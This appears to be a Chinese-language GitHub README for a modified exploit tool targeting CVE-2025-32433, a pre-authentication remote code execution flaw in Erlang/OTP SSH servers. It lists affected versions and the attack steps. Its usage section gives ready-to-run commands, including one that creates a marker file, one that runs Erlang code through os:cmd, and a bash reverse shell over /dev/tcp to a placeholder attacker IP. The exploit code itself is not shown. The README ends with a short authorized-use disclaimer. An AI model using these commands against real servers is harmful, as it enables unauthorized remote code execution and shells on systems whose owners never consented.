chuzouX/CVE-2025-32433-Exploit-edited

# CVE-2025-32433 漏洞利用（兼容 Windows） Erlang/OTP SSH 未授权远程代码执行 ## 描述 本仓库包含针对 CVE-2025-32433 的漏洞利用代码，这是 Erlang/OTP SSH 服务器中的一个严重的未授权远程代码执行漏洞。 **主要功能：** - ✅ 认证前 RCE 漏洞利用 - ✅ 修复了 Windows GBK 编码兼容性问题 - ✅ 适用于 Erlang/OTP 版本 ≤ 27.3.2, ≤ 26.2.5.10, ≤ 25.3.2.19 ## 漏洞详情 **CVE ID:** CVE-2025-32433 **严重程度：** 严重 **影响：** 未授权远程代码执行 该漏洞允许攻击者通过发送特制的 SSH 协议消息，在未经身份验证的情况下对 Erlang/OTP SSH 服务器执行任意系统命令。 ## 受影响版本 ``` OTP ≤ 27.3.2 OTP ≤ 26.2.5.10 OTP ≤ 25.3.2.19 OTP ≥ 17.0 and older (likely) ``` ## 用法 ``` # Basic 命令执行 python exploit.py -t -p 2222 -c "whoami" # 执行 system 命令 python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned" # Raw Erlang 代码执行 python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").' # Reverse shell python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1" ``` ## 参数 ``` -t, --target Target IP address (default: 127.0.0.1) -p, --port Target port (default: 2222) -c, --command System command to execute -e, --erlang Raw Erlang code to execute ``` ## Windows 编码修复 此版本修复了原始漏洞利用程序中存在的编码问题： **问题：** 原始漏洞利用程序使用了 Unicode 对号字符 (✓, U+2713)，这在 Windows 上会导致 GBK 编码错误： ``` 'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence ``` **解决方案：** 将 Unicode 字符替换为标准的 ASCII `+` 字符，以实现跨平台兼容性。 ## 技术细节 漏洞利用的工作原理如下： 1. 建立 SSH 连接并进行 banner 交换 2. 发送 SSH_MSG_KEXINIT 数据包 3. 使用 SSH_MSG_CHANNEL_OPEN 打开 SSH 通道 4. **在身份验证之前**发送带有恶意 exec 命令的 SSH_MSG_CHANNEL_REQUEST 5. 通过 `os:cmd()` 执行任意 Erlang 代码 ## 参考资源 - [GitHub 安全公告](https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2) - [Erlang/OTP 提交修复](https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f) - [RFC 4254 - SSH 连接协议](https://datatracker.ietf.org/doc/html/rfc4254) - [ProDefense CVE-2025-32433](https://github.com/ProDefense/CVE-2025-32433) ## 已修复版本 - OTP 27.3.3 - OTP 26.2.5.11 - OTP 25.3.2.20 ## 免责声明 此漏洞利用程序仅供教育和授权的安全测试目的使用。未经授权访问计算机系统是违法行为。请负责任地使用，并且仅在获得明确许可的系统上进行测试。 ## 许可证 MIT 许可证 ## 作者 由 chuzouX 修改以兼容 Windows

标签：Erlang, Python, SSH协议, 威胁模拟, 无后门, 编程工具, 远程代码执行, 逆向工具